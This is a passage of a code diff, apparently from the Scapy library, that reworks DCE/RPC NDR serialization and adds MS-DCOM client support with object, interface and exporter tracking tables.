find_dcerpc_interface(name): class ComInterface: + if_version = 0 + def __init__(self, name, uuid, opnums): self.name = name self.uuid = uuid @@ -1273,6 +1336,19 @@ def register_com_interface(name, uuid, opnums): uuid, opnums, ) + # bind for build + for opnum, operations in opnums.items(): + bind_top_down(DceRpc5Request, operations.request, opnum=opnum) + + +def find_com_interface(name) -> ComInterface: + """ + Find an interface object through the name in the IDL + """ + try: + return next(x for x in COM_INTERFACES.values() if x.name == name) + except StopIteration: + raise AttributeError("Unknown interface !") # --- NDR fields - [C706] chap 14 @@ -1297,7 +1373,7 @@ class _NDRPacket(Packet): __slots__ = ["ndr64", "ndrendian", "deferred_pointers", "request_packet"] def __init__(self, *args, **kwargs): - self.ndr64 = kwargs.pop("ndr64", False) + self.ndr64 = kwargs.pop("ndr64", conf.ndr64) self.ndrendian = kwargs.pop("ndrendian", "little") # request_packet is used in the session, so that a response packet # can resolve union arms if the case parameter is in the request. @@ -1806,7 +1882,16 @@ def read_deferred_pointers(self, pkt, s): return s def addfield(self, pkt, s, val): - s = super(NDRConstructedType, self).addfield(pkt, s, val) + try: + s = super(NDRConstructedType, self).addfield(pkt, s, val) + except Exception as ex: + try: + ex.args = ( + "While building field '%s': " % self.name + ex.args[0], + ) + ex.args[1:] + except (AttributeError, IndexError): + pass + raise ex if isinstance(val, _NDRPacket): # If a sub-packet we just dissected has deferred pointers, # pass it to parent packet to propagate. @@ -1916,6 +2001,8 @@ def __init__(self, name, default, pkt_cls, **kwargs): def m2i(self, pkt, s): remain, val = self.fld.getfield(pkt, s) + if val is None: + val = NDRNone() # A mistake here would be to use / instead of add_payload. It adds a copy # which breaks pointer defferal. Same applies elsewhere val.add_payload(conf.padding_layer(remain)) @@ -1934,7 +2021,9 @@ def i2len(self, pkt, x): return len(x) def valueof(self, pkt, x): - return [self.fld.valueof(pkt, y) for y in x] + return [ + self.fld.valueof(pkt, y if not isinstance(y, NDRNone) else None) for y in x + ] class NDRFieldListField(NDRConstructedType, FieldListField): @@ -2113,6 +2202,9 @@ class _NDRConfField: COUNT_FROM = False def __init__(self, *args, **kwargs): + # when conformant_in_struct is True, we remove the level of abstraction + # provided by NDRConformantString / NDRConformantArray because max_count + # is a proper field in the parent packet. self.conformant_in_struct = kwargs.pop("conformant_in_struct", False) # size_is/max_is end up here, and is what defines a conformant field. if "size_is" in kwargs: @@ -2265,7 +2357,8 @@ class NDRConfStrLenField(_NDRConfField, _NDRValueOf, StrLenField): NDR Conformant StrLenField. This is not a "string" per NDR, but an a conformant byte array - (e.g. tower_octet_string) + (e.g. tower_octet_string). For ease of use, we implicitly convert + it in specific cases. """ CONFORMANT_STRING = True @@ -2276,7 +2369,7 @@ class NDRConfStrLenFieldUtf16(_NDRConfField, _NDRValueOf, StrLenFieldUtf16, _NDR """ NDR Conformant StrLenFieldUtf16. - See NDRConfLenStrField for comment. + See NDRConfStrLenField for comment. """ CONFORMANT_STRING = True @@ -2415,23 +2508,60 @@ def any2i(self, pkt, x): # Misc -class NDRRecursiveField(Field): +class _ProxyArray: + # Hack for recursive fields DEPORTED_CONFORMANTS field + __slots__ = ["getfld"] + + def __init__(self, getfld): + self.getfld = getfld + + def __len__(self): + try: + return len(self.getfld()) + except AttributeError: + return 0 + + def __iter__(self): + try: + return iter(self.getfld()) + except AttributeError: + return iter([]) + + +class _ProxyTuple: + # Hack for recursive fields ALIGNMENT field + __slots__ = ["getfld"] + + def __init__(self, getfld): + self.getfld = getfld + + def __getitem__(self, name): + try: + return self.getfld()[name] + except AttributeError: + raise KeyError + + +def NDRRecursiveClass(clsname): """ - A special Field that is used for pointer recursion + Return a special class that is used for pointer recursion """ + # Get module where this is called + frame = inspect.currentframe().f_back + mod = frame.f_globals["__loader__"].name + getcls = lambda: getattr(importlib.import_module(mod), clsname) - def __init__(self, name, fmt="I"): - super(NDRRecursiveField, self).__init__(name, None, fmt=fmt) - - def getfield(self, pkt, s): - return NDRFullEmbPointerField(NDRPacketField("", None, pkt.__class__)).getfield( - pkt, s + class _REC(NDRPacket): + ALIGNMENT = _ProxyTuple(lambda: getattr(getcls(), "ALIGNMENT")) + DEPORTED_CONFORMANTS = _ProxyArray( + lambda: getattr(getcls(), "DEPORTED_CONFORMANTS") ) - def addfield(self, pkt, s, val): - return NDRFullEmbPointerField(NDRPacketField("", None, pkt.__class__)).addfield( - pkt, s, val - ) + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + return getcls() + + return _REC # The very few NDR-specific structures @@ -2448,6 +2578,16 @@ def guess_payload_class(self, payload): return conf.padding_layer +class NDRNone(NDRPacket): + # This is only used in NDRPacketListField to act as a "None" pointer, and is + # a workaround because the field doesn't support None as a value in the list. + name = "None" + ALIGNMENT = (4, 8) + fields_desc = [ + NDRInt3264Field("ptr", 0), + ] + + # --- Type Serialization Version 1 - [MSRPCE] sect 2.2.6 @@ -2465,6 +2605,25 @@ class NDRSerialization1Header(Packet): XLEIntField("Filler", 0xCCCCCCCC), ] + # Add a bit of goo so that valueof() goes through the header + + def _ndrlayer(self): + cur = self + while cur and not isinstance(cur, _NDRPacket) and cur.payload: + cur = cur.payload + if isinstance(cur, NDRPointer): + cur = cur.value + return cur + + def getfield_and_val(self, attr): + try: + return Packet.getfield_and_val(self, attr) + except ValueError: + return self._ndrlayer().getfield_and_val(attr) + + def valueof(self, name): + return self._ndrlayer().valueof(name) + class NDRSerialization1PrivateHeader(Packet): fields_desc = [ @@ -2475,18 +2634,27 @@ class NDRSerialization1PrivateHeader(Packet): ] -def ndr_deserialize1(b, cls, ndr64=False): +def ndr_deserialize1(b, cls, ptr_pack=False): """ - Deserialize Type Serialization Version 1 according to [MS-RPCE] sect 2.2.6 + Deserialize Type Serialization Version 1 + [MS-RPCE] sect 2.2.6 + + :param ptr_pack: pack in a pointer to the structure. """ if issubclass(cls, NDRPacket): - # We use an intermediary class for two reasons: - # - it properly sets deferred pointers - # - it uses NDRPacketField which handles deported conformant fields - class _cls(NDRPacket): - fields_desc = [ - NDRFullPointerField(NDRPacketField("pkt", None, cls)), - ] + # We use an intermediary class because it uses NDRPacketField which handles + # deported conformant fields + if ptr_pack: + hdrlen = 20 + + class _cls(NDRPacket): + fields_desc = [NDRFullPointerField(NDRPacketField("pkt", None, cls))] + + else: + hdrlen = 16 + + class _cls(NDRPacket): + fields_desc = [NDRPacketField("pkt", None, cls)] hdr = NDRSerialization1Header(b[:8]) / NDRSerialization1PrivateHeader(b[8:16]) endian = {0x00: "big", 0x10: "little"}[hdr.Endianness] @@ -2496,18 +2664,21 @@ class _cls(NDRPacket): return ( hdr / _cls( - b[16 : 20 + hdr.ObjectBufferLength], - ndr64=ndr64, + b[16 : hdrlen + hdr.ObjectBufferLength], + ndr64=False, # Only NDR32 is supported in Type 1 ndrendian=endian, ).pkt - / conf.padding_layer(b[20 + padlen + hdr.ObjectBufferLength :]) + / conf.padding_layer(b[hdrlen + padlen + hdr.ObjectBufferLength :]) ) return NDRSerialization1Header(b[:8]) / cls(b[8:]) -def ndr_serialize1(pkt): +def ndr_serialize1(pkt, ptr_pack=False): """ Serialize Type Serialization Version 1 + [MS-RPCE] sect 2.2.6 + + :param ptr_pack: pack in a pointer to the structure. """ pkt = pkt.copy() endian = getattr(pkt, "ndrendian", "little") @@ -2533,39 +2704,48 @@ def ndr_serialize1(pkt): pkt.payload.remove_payload() # See above about why we need an intermediary class - class _cls(NDRPacket): - fields_desc = [ - NDRFullPointerField(NDRPacketField("pkt", None, cls)), - ] + if ptr_pack: + + class _cls(NDRPacket): + fields_desc = [NDRFullPointerField(NDRPacketField("pkt", None, cls))] + + else: - ret = bytes(pkt / _cls(pkt=val)) + class _cls(NDRPacket): + fields_desc = [NDRPacketField("pkt", None, cls)] + + ret = bytes(pkt / _cls(pkt=val, ndr64=False, ndrendian=endian)) return ret + (-len(ret) % _TYPE1_S_PAD) * b"\x00" class _NDRSerializeType1: def __init__(self, *args, **kwargs): + self.ptr_pack = kwargs.pop("ptr_pack", False) super(_NDRSerializeType1, self).__init__(*args, **kwargs) def i2m(self, pkt, val): - return ndr_serialize1(val) + return ndr_serialize1(val, ptr_pack=self.ptr_pack) def m2i(self, pkt, s): - return ndr_deserialize1(s, self.cls, ndr64=False) + return ndr_deserialize1(s, self.cls, ptr_pack=self.ptr_pack) def i2len(self, pkt, val): return len(self.i2m(pkt, val)) class NDRSerializeType1PacketField(_NDRSerializeType1, PacketField): - __slots__ = ["ptr"] + __slots__ = ["ptr_pack"] class NDRSerializeType1PacketLenField(_NDRSerializeType1, PacketLenField): - __slots__ = ["ptr"] + __slots__ = ["ptr_pack"] class NDRSerializeType1PacketListField(_NDRSerializeType1, PacketListField): - __slots__ = ["ptr"] + __slots__ = ["ptr_pack"] + + def i2len(self, pkt, val): + return sum(len(self.i2m(pkt, p)) for p in val) # --- DCE/RPC session @@ -2577,7 +2757,8 @@ class DceRpcSession(DefaultSession): """ def __init__(self, *args, **kwargs): - self.rpc_bind_interface = None + self.rpc_bind_interface: Union[DceRpcInterface, ComInterface] = None + self.rpc_bind_is_com: bool = False self.ndr64 = False self.ndrendian = "little" self.support_header_signing = kwargs.pop("support_header_signing", True) @@ -2586,6 +2767,8 @@ def __init__(self, *args, **kwargs): self.sspcontext = kwargs.pop("sspcontext", None) self.auth_level = kwargs.pop("auth_level", None) self.auth_context_id = kwargs.pop("auth_context_id", 0) + self.sent_cont_ids = [] + self.cont_id = 0 # Currently selected context self.map_callid_opnum = {} self.frags = collections.defaultdict(lambda: b"") self.sniffsspcontexts = {} # Unfinished contexts for passive @@ -2603,27 +2786,50 @@ def _up_pkt(self, pkt): opts = {} if DceRpc5Bind in pkt or DceRpc5AlterContext in pkt: # bind => get which RPC interface + self.sent_cont_ids = [x.cont_id for x in pkt.context_elem] for ctx in pkt.context_elem: if_uuid = ctx.abstract_syntax.if_uuid if_version = ctx.abstract_syntax.if_version try: self.rpc_bind_interface = DCE_RPC_INTERFACES[(if_uuid, if_version)] + self.rpc_bind_is_com = False except KeyError: - self.rpc_bind_interface = None - log_runtime.warning( - "Unknown RPC interface %s. Try loading the IDL" % if_uuid - ) + try: + self.rpc_bind_interface = COM_INTERFACES[if_uuid] + self.rpc_bind_is_com = True + except KeyError: + self.rpc_bind_interface = None + log_runtime.warning( + "Unknown RPC interface %s. Try loading the IDL" % if_uuid + ) elif DceRpc5BindAck in pkt or DceRpc5AlterContextResp in pkt: # bind ack => is it NDR64 - for res in pkt.results: + for i, res in enumerate(pkt.results): if res.result == 0: # Accepted + # Context + try: + self.cont_id = self.sent_cont_ids[i] + except IndexError: + self.cont_id = 0 + finally: + self.sent_cont_ids = [] + + # Endianness self.ndrendian = {0: "big", 1: "little"}[pkt[DceRpc5].endian] + + # Transfer syntax if res.transfer_syntax.sprintf("%if_uuid%") == "NDR64": self.ndr64 = True elif DceRpc5Request in pkt: # request => match opnum with callID opnum = pkt.opnum - self.map_callid_opnum[pkt.call_id] = opnum, pkt[DceRpc5Request].payload + if self.rpc_bind_is_com: + self.map_callid_opnum[pkt.call_id] = ( + opnum, + pkt[DceRpc5Request].payload.payload, + ) + else: + self.map_callid_opnum[pkt.call_id] = opnum, pkt[DceRpc5Request].payload elif DceRpc5Response in pkt: # response => get opnum from table try: @@ -2862,6 +3068,21 @@ def in_pkt(self, pkt): pkt.payload[conf.raw_layer].load = body return pkt if body: + orpc = None + if self.rpc_bind_is_com: + # If interface is a COM interface, start off by dissecting the + # ORPCTHIS / ORPCTHAT argument + from scapy.layers.msrpce.raw.ms_dcom import ORPCTHAT, ORPCTHIS + + # [MS-DCOM] sect 2.2.13 + # "ORPCTHIS and ORPCTHAT structures MUST be marshaled using + # the NDR (32) Transfer Syntax" + if is_response: + orpc = ORPCTHAT(body, ndr64=False) + else: + orpc = ORPCTHIS(body, ndr64=False) + body = orpc.load + orpc.remove_payload() # Dissect payload using class try: payload = cls( @@ -2881,6 +3102,8 @@ def in_pkt(self, pkt): ) pad = payload[conf.padding_layer] pad.underlayer.payload = conf.raw_layer(load=pad.load) + if orpc is not None: + pkt /= orpc pkt /= payload # If a request was encrypted, we need to re-register it once re-parsed. if not is_response and self.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: @@ -2917,15 +3140,15 @@ def out_pkt(self, pkt): RPC_C_AUTHN_LEVEL.PKT_INTEGRITY, RPC_C_AUTHN_LEVEL.PKT_PRIVACY, ): + # Remember that vt_trailer is included in the PDU + if pkt.vt_trailer: + body += bytes(pkt.vt_trailer) # Account for padding when computing checksum/encryption if pkt.auth_padding is None: padlen = (-len(body)) % _COMMON_AUTH_PAD # authdata padding pkt.auth_padding = b"\x00" * padlen else: padlen = len(pkt.auth_padding) - # Remember that vt_trailer is included in the PDU - if pkt.vt_trailer: - body += bytes(pkt.vt_trailer) # Remember that padding IS SIGNED & ENCRYPTED body += pkt.auth_padding # Add the auth_verifier diff --git a/scapy/layers/msrpce/ept.py b/scapy/layers/msrpce/ept.py index d024e2c336a..1f51993f311 100644 --- a/scapy/layers/msrpce/ept.py +++ b/scapy/layers/msrpce/ept.py @@ -24,8 +24,9 @@ ) from scapy.packet import Packet from scapy.layers.dcerpc import ( - DCE_RPC_INTERFACES_NAMES, DCE_RPC_INTERFACES_NAMES_rev, + DCE_RPC_INTERFACES_NAMES, + DCE_RPC_PROTOCOL_IDENTIFIERS, DCE_RPC_TRANSFER_SYNTAXES, ) @@ -70,37 +71,10 @@ class prot_and_addr_t(Packet): "lhs_length", 0, ), - # [C706] Appendix I with names from Appendix B ByteEnumField( "protocol_identifier", 0, - { - 0x0: "OSI OID", # Special - 0x0D: "UUID", # Special - # Transports - # 0x2: "DNA Session Control", - # 0x3: "DNA Session Control V3", - # 0x4: "DNA NSP Transport", - # 0x5: "OSI TP4", - 0x06: "NCADG_OSI_CLSN", # [C706] - 0x07: "NCACN_IP_TCP", # [C706] - 0x08: "NCADG_IP_UDP", # [C706] - 0x09: "IP", # [C706] - 0x0A: "RPC connectionless protocol", # [C706] - 0x0B: "RPC connection-oriented protocol", # [C706] - 0x0C: "NCALRPC", - 0x0F: "NCACN_NP", # [MS-RPCE] - 0x11: "NCACN_NB", # [C706] - 0x12: "NCACN_NB_NB", # [MS-RPCE] - 0x13: "NCACN_SPX", # [C706] - 0x14: "NCADG_IPX", # [C706] - 0x16: "NCACN_AT_DSP", # [C706] - 0x17: "NCADG_AT_DSP", # [C706] - 0x19: "NCADG_NB", # [C706] - 0x1A: "NCACN_VNS_SPP", # [C706] - 0x1B: "NCADG_VNS_IPC", # [C706] - 0x1F: "NCACN_HTTP", # [MS-RPCE] - }, + DCE_RPC_PROTOCOL_IDENTIFIERS, ), # 0x0 ConditionalField( diff --git a/scapy/layers/msrpce/msdcom.py b/scapy/layers/msrpce/msdcom.py index 4ed6cd221fb..cc4208acc4a 100644 --- a/scapy/layers/msrpce/msdcom.py +++ b/scapy/layers/msrpce/msdcom.py @@ -9,58 +9,95 @@ https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/4a893f3d-bd29-48cd-9f43-d9777a4415b0 """ -import collections +import enum +import hashlib +import re +import socket import uuid from scapy.config import conf from scapy.packet import Packet, bind_layers from scapy.fields import ( ConditionalField, + FieldLenField, + FlagsField, LEIntField, + LELongField, LEShortEnumField, LEShortField, PacketField, PacketListField, + PadField, + StrLenField, StrNullFieldUtf16, UUIDField, - XStrFixedLenField, XShortField, + XStrFixedLenField, ) +from scapy.volatile import RandUUID + from scapy.layers.dcerpc import ( + ComInterface, + DCE_C_AUTHN_LEVEL, + DCE_RPC_PROTOCOL_IDENTIFIERS, + DceRpc5Request, + find_com_interface, + find_dcerpc_interface, + ndr_deserialize1, + NDRConfFieldListField, + NDRConfPacketListField, + NDRConfVarStrNullFieldUtf16, NDRFieldListField, + NDRFullEmbPointerField, + NDRFullPointerField, + NDRIntEnumField, NDRIntField, NDRLongField, NDRPacket, NDRPacketField, - NDRFullEmbPointerField, - NDRFullPointerField, - NDRConfPacketListField, - NDRConfFieldListField, - NDRConfStrLenFieldUtf16, - NDRConfVarStrNullFieldUtf16, - NDRShortField, - NDRSignedIntField, NDRSerializeType1PacketField, NDRSerializeType1PacketListField, - ndr_deserialize1, - find_dcerpc_interface, + NDRShortField, + NDRSignedIntField, RPC_C_AUTHN, ) +from scapy.utils import valid_ip6, valid_ip from scapy.layers.msrpce.rpcclient import DCERPC_Client, DCERPC_Transport from scapy.layers.msrpce.raw.ms_dcom import ( COMVERSION, + DUALSTRINGARRAY, GUID, - ServerAlive2_Request, MInterfacePointer, + ORPCTHAT, + ORPCTHIS, + REMINTERFACEREF, + RemoteCreateInstance_Request, + RemoteCreateInstance_Response, + RemoteGetClassObject_Request, + RemoteGetClassObject_Response, + RemQueryInterface_Request, + RemRelease_Request, + ResolveOxid2_Request, + ServerAlive2_Request, + tagCPFLAGS, +) + +# Typing +from typing import ( + Any, + List, + Dict, + Optional, + Tuple, ) def _uid_to_bytes(x, ndrendian="little"): if ndrendian == "little": - return uuid.UUID(x).bytes_le + return x.bytes_le elif ndrendian == "big": - return uuid.UUID(x).bytes + return x.bytes else: raise ValueError("bad ndrendian") @@ -101,6 +138,13 @@ def _uid_from_bytes(x, ndrendian="little"): # [MS-DCOM] 2.2.22.2.1 +class ACTVFLAGS(enum.IntEnum): + DISABLE_AAA = 0x00000002 + ACTIVATE_32_BIT_SERVER = 0x00000004 + ACTIVATE_64_BIT_SERVER = 0x00000008 + NO_FAILURE_LOG = 0x00000020 + + class InstantiationInfoData(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ @@ -108,7 +152,7 @@ class InstantiationInfoData(NDRPacket): NDRIntField("classCtx", 0), NDRIntField("actvflags", 0), NDRSignedIntField("fIsSurrogate", 0), - NDRIntField("cIID", 0), + NDRIntField("cIID", None, size_of="pIID"), NDRIntField("instFlag", 0), NDRFullEmbPointerField( NDRConfPacketListField( @@ -116,7 +160,11 @@ class InstantiationInfoData(NDRPacket): ), ), NDRIntField("thisSize", 0), - NDRPacketField("clientCOMVersion", COMVERSION(), COMVERSION), + NDRPacketField( + "clientCOMVersion", + COMVERSION(), + COMVERSION, + ), ] @@ -126,18 +174,28 @@ class InstantiationInfoData(NDRPacket): class SpecialPropertiesData(NDRPacket): ALIGNMENT = (8, 8) fields_desc = [ - NDRIntField("dwSessionId", 0), + NDRIntField("dwSessionId", 0xFFFFFFFF), NDRSignedIntField("fRemoteThisSessionId", 0), NDRSignedIntField("fClientImpersonating", 0), NDRSignedIntField("fPartitionIDPresent", 0), - NDRIntField("dwDefaultAuthnLvl", 0), + NDRIntField( + "dwDefaultAuthnLvl", DCE_C_AUTHN_LEVEL.PKT_INTEGRITY + ), # Same than Windows NDRPacketField("guidPartition", GUID(), GUID), NDRIntField("dwPRTFlags", 0), NDRIntField("dwOrigClsctx", 0), - NDRIntField("dwFlags", 0), + NDRIntEnumField( + "dwFlags", + 0, + { + 0x00000001: "SPD_FLAG_USE_CONSOLE_SESSION", + }, + ), NDRIntField("Reserved1", 0), NDRLongField("Reserved2", 0), - NDRFieldListField("Reserved3", [], NDRIntField("", 0), count_from=lambda _: 5), + NDRFieldListField( + "Reserved3", [0, 0, 0, 0, 0], NDRIntField("", 0), count_from=lambda _: 5 + ), ] @@ -164,11 +222,14 @@ class InstanceInfoData(NDRPacket): class customREMOTE_REQUEST_SCM_INFO(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRIntField("ClientImpLevel", 0), - NDRShortField("cRequestedProtseqs", 0), + NDRIntField("ClientImpLevel", 2), # note <33> + NDRShortField("cRequestedProtseqs", None, size_of="pRequestedProtseqs"), NDRFullEmbPointerField( - NDRConfStrLenFieldUtf16( - "pRequestedProtseqs", "", length_from=lambda pkt: pkt.cRequestedProtseqs + NDRConfFieldListField( + "pRequestedProtseqs", + [], + NDRShortField("", 0), + size_is=lambda pkt: pkt.cRequestedProtseqs, ), ), ] @@ -214,7 +275,7 @@ class LocationInfoData(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ NDRFullEmbPointerField( - NDRConfVarStrNullFieldUtf16("machineName", ""), + NDRConfVarStrNullFieldUtf16("machineName", None), ), NDRIntField("processId", 0), NDRIntField("apartmentId", 0), @@ -242,36 +303,10 @@ class SecurityInfoData(NDRPacket): NDRFullEmbPointerField( NDRPacketField("pServerInfo", COSERVERINFO(), COSERVERINFO), ), - NDRFullPointerField(NDRIntField("pdwReserved", 0)), + NDRFullPointerField(NDRIntField("pdwReserved", None)), ] -# [MS-DCOM] 2.2.22.2.8 - - -class DUALSTRINGARRAY(NDRPacket): - ALIGNMENT = (4, 8) - CONFORMANT_COUNT = 1 - fields_desc = [ - NDRShortField("wNumEntries", 0), - NDRShortField("wSecurityOffset", 0), - NDRConfStrLenFieldUtf16( - "aStringArray", "", length_from=lambda pkt: pkt.wNumEntries - ), - ] - - -def _parseStringArray(self): - """ - Process aStringArray - """ - str_fld = PacketListField("", [], STRINGBINDING) - sec_fld = PacketListField("", [], SECURITYBINDING) - string = str_fld.getfield(self, self.aStringArray[: self.wSecurityOffset * 2])[1] - secs = sec_fld.getfield(self, self.aStringArray[self.wSecurityOffset * 2 :])[1] - return string, secs - - class customREMOTE_REPLY_SCM_INFO(NDRPacket): ALIGNMENT = (8, 8) fields_desc = [ @@ -305,27 +340,26 @@ class ScmReplyInfoData(NDRPacket): class PropsOutInfo(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRIntField("cIfs", 0), + NDRIntField("cIfs", None, size_of="ppIntfData"), NDRFullEmbPointerField( - NDRConfPacketListField( - "piid", [GUID()], GUID, count_from=lambda pkt: pkt.cIfs - ), + NDRConfPacketListField("piid", [], GUID, size_is=lambda pkt: pkt.cIfs) ), NDRFullEmbPointerField( NDRConfFieldListField( "phresults", [], - NDRSignedIntField("", 0), - count_from=lambda pkt: pkt.cIfs, - ), + NDRSignedIntField("phresults", 0), + size_is=lambda pkt: pkt.cIfs, + ) ), NDRFullEmbPointerField( NDRConfPacketListField( "ppIntfData", - [MInterfacePointer()], + [], MInterfacePointer, - count_from=lambda pkt: pkt.cIfs, - ), + size_is=lambda pkt: pkt.cIfs, + ptr_pack=True, + ) ), ] @@ -339,8 +373,8 @@ class CustomHeader(NDRPacket): NDRIntField("totalSize", 0), NDRIntField("headerSize", 0), NDRIntField("dwReserved", 0), - NDRIntField("destCtx", 0), - NDRIntField("cIfs", 0), + NDRIntEnumField("destCtx", 2, {2: "MSHCTX_DIFFERENTMACHINE"}), + NDRIntField("cIfs", None, size_of="pSizes"), NDRPacketField("classInfoClsid", GUID(), GUID), NDRFullEmbPointerField( NDRConfPacketListField( @@ -349,26 +383,27 @@ class CustomHeader(NDRPacket): ), NDRFullEmbPointerField( NDRConfFieldListField( - "pSizes", [], NDRIntField("", 0), count_from=lambda pkt: pkt.cIfs + "pSizes", None, NDRIntField("", 0), count_from=lambda pkt: pkt.cIfs ), ), - NDRFullEmbPointerField(NDRIntField("pdwReserved", 0)), + NDRFullEmbPointerField(NDRIntField("pdwReserved", None)), ] class _ActivationPropertiesField(NDRSerializeType1PacketListField): def __init__(self, *args, **kwargs): kwargs["next_cls_cb"] = self._get_cls_activation - # kwargs["ptr"] = False super(_ActivationPropertiesField, self).__init__(*args, **kwargs) def _get_cls_activation(self, pkt, lst, cur, remain): - pclsid = pkt.CustomHeader.data.pclsid.value.value - ndrendian = pkt.CustomHeader.data.ndrendian + # Get all the pcslsid + pclsid = pkt.CustomHeader[CustomHeader].valueof("pclsid") + ndrendian = pkt.CustomHeader[CustomHeader].ndrendian i = len(lst) + int(bool(cur)) if i >= len(pclsid): return - next_uid = _uid_from_bytes(pclsid[i], ndrendian=ndrendian) + # Get the next pclsid we need to process + next_uid = _uid_from_bytes(bytes(pclsid[i]), ndrendian=ndrendian) # [MS-DCOM] 1.9 cls = { CLSID_ActivationContextInfo: ActivationContextInfoData, @@ -381,12 +416,19 @@ def _get_cls_activation(self, pkt, lst, cur, remain): CLSID_ServerLocationInfo: LocationInfoData, CLSID_SpecialSystemProperties: SpecialPropertiesData, }[next_uid] - return lambda x: ndr_deserialize1(x, cls, ndr64=False) + return lambda x: ndr_deserialize1(x, cls) class ActivationPropertiesBlob(Packet): fields_desc = [ - LEIntField("dwSize", 0), + FieldLenField( + "dwSize", + None, + fmt=" Tuple[List[STRINGBINDING], List[SECURITYBINDING]]: + """ + Process aStringArray in a DUALSTRINGARRAY to extract string bindings and + security bindings. + """ + str_fld = PacketListField("", [], STRINGBINDING) + sec_fld = PacketListField("", [], SECURITYBINDING) + string = str_fld.getfield(dual, dual.aStringArray[: dual.wSecurityOffset * 2])[1] + secs = sec_fld.getfield(dual, dual.aStringArray[dual.wSecurityOffset * 2 :])[1] + if string[-1].wTowerId != 0 or secs[-1].wAuthnSvc != 0: + raise ValueError("Invalid DUALSTRINGARRAY !") + return string[:-1], secs[:-1] + + +def _HashStringBinding(strings: List[STRINGBINDING]): + """ + Hash a STRINGBINDING list + """ + return hashlib.sha256(b"".join(bytes(x) for x in strings)).digest() + + +# Entries. + + +class IPID_Entry: + """ + An entry in the IPID table + [MS-DCOM] 3.1.1.1 Abstract Data Model + """ + + def __init__(self): + self.ipid: Optional[uuid.UUID] = None + self.iid: Optional[uuid.UUID] = None + self.oid: Optional[int] = None + self.oxid: Optional[int] = None + self.cPublicRefs: int = 0 + self.cPrivateRefs: int = 0 + self.state: Any = None + # Additions + self.iface: Optional[ComInterface] = None + + +class OID_Entry: + """ + An entry in the OID table + [MS-DCOM] 3.1.1.1 Abstract Data Model + """ + + def __init__(self): + self.oid: Optional[int] = None + self.oxid: Optional[int] = None + self.ipids: List[uuid.UUID] = [] + self.hash: Optional[bytes] = None + self.last_orpc: int = None + self.garbage_collection: bool = True + self.state = None + + +class Resolver_Entry: + """ + An entry in the Resolver table. + [MS-DCOM] 3.2.1 Abstract Data Model + """ + + def __init__(self): + self.hash: Optional[bytes] = None + self.binds: List[STRINGBINDING] = [] + self.secs: List[SECURITYBINDING] = [] + self.setid: Optional[int] = None + self.client: Optional[DCERPC_Client] = None + + +class SETID_Entry: + """ + An entry in the SETID table. + [MS-DCOM] 3.2.1 Abstract Data Model + """ + + def __init__(self): + self.setid: Optional[int] = None + self.oids: List[int] = [] + self.seq: Optional[int] = None + + +class OXID_Entry: + """ + An entry in the OXID table. + [MS-DCOM] 3.2.1 Abstract Data Model + """ + + def __init__(self): + self.oxid: Optional[int] = None + self.bindingInfo: Optional[Tuple[str, int]] = None + self.authnHint: DCE_C_AUTHN_LEVEL = DCE_C_AUTHN_LEVEL.CONNECT + self.version: Optional[COMVERSION] = None + self.ipid_IRemUnknown: Optional[uuid.UUID] = None + + def __repr__(self): + return f"" + + +class ObjectInstance: + """ + An reference to an instantiated object. + + This is a helper to manipulate this object and perform calls over it. + """ + + def __init__(self, client: "DCOM_Client", oid: int): + self.client = client + self.oid = oid + + def __repr__(self): + return f"" + + @property + def valid(self): + """ + Returns whether the current object still exists + """ + return self.oid in self.client.OID_table + + @property + def ndr64(self): + """ + Whether NDR64 is required to talk to this object + """ + return self.client.ndr64 + + def sr1_req( + self, + pkt: NDRPacket, + iface: ComInterface, + ssp=None, + auth_level=None, + timeout=None, + **kwargs, + ): + """ + Make an ORPC call on this object instance. + + :param iface: the ComInterface to call. + :param pkt: the request to make. + + :param ssp: (optional) non default SSP to use to connect to the object exporter + :param auth_level: (optional) non default authn level to use + :param timeout: (optional) timeout for the connection + """ + # Look for this object's entry + try: + oid_entry = self.client.OID_table[self.oid] + except KeyError: + raise ValueError("This object has been released.") + + # Look for the ipid matching the interface required by the user + ipid = None + for ipid in oid_entry.ipids: + ipid_entry = self.client.IPID_table[ipid] + if ipid_entry.iid == iface.uuid: + break + else: + # Acquire interface on the object + self.client.AcquireInterface( + ipid=oid_entry.ipids[0], + iids=[ + iface, + ], + cPublicRefs=1, + ) + + return self.client.sr1_orpc_req( + ipid=ipid, + pkt=pkt, + ssp=ssp, + auth_level=auth_level, + timeout=timeout, + **kwargs, + ) + + def release(self): + """ + Call IRemUnknown2::RemRelease to release counts on an object reference. + """ + for ipid in self.client.OID_table[self.oid].ipids: + self.client.RemRelease(ipid) class DCOM_Client(DCERPC_Client): """ A wrapper of DCERPC_Client that adds functions to use COM interfaces. - In this client, the DCE/RPC is abstracted to allow to focus on the upper - DCOM one. DCE/RPC interfaces are bound automatically and ORPCTHIS/ORPCTHAT - automatically added/extracted. - - It also provides common handlers for the few [MS-DCOM] special interfaces. + :param cid: the client identifier """ - def __init__(self, verb=True, **kwargs): + IREMUNKNOWN = find_com_interface("IRemUnknown2") + + def __init__(self, cid: GUID = None, verb=True, **kwargs): + # Pick a random cid to identify this client + self.cid = cid or GUID(RandUUID().bytes_le) + + # The OXID table kept up-to-date by the client + self.OXID_table: Dict[int, OXID_Entry] = {} + + # The IPID table kept up-to-date by the client + self.IPID_table: Dict[int, IPID_Entry] = {} + + # The OID table kept up-to-date by the client + self.OID_table: Dict[int, OID_Entry] = {} + + # The Resolver table kept up-to-date by the client + self.Resolver_table: Dict[STRINGBINDING, Resolver_Entry] = {} + + # DCOM defaults to at least PKT_INTEGRITY + if "auth_level" not in kwargs and "ssp" in kwargs: + kwargs["auth_level"] = DCE_C_AUTHN_LEVEL.PKT_INTEGRITY + super(DCOM_Client, self).__init__( - DCERPC_Transport.NCACN_IP_TCP, ndr64=False, verb=verb, **kwargs + DCERPC_Transport.NCACN_IP_TCP, + ndr64=False, + verb=verb, + **kwargs, + ) + + def connect(self, host: str, timeout=5): + """ + Initiate a connection to the object resolver. + + :param host: the host to connect to + :param timeout: (optional) the connection timeout (default 5) + """ + # [MS-DCOM] 3.2.4.1.2.1 Determining RPC Binding Information + binds, _ = ServerAlive2(host) + 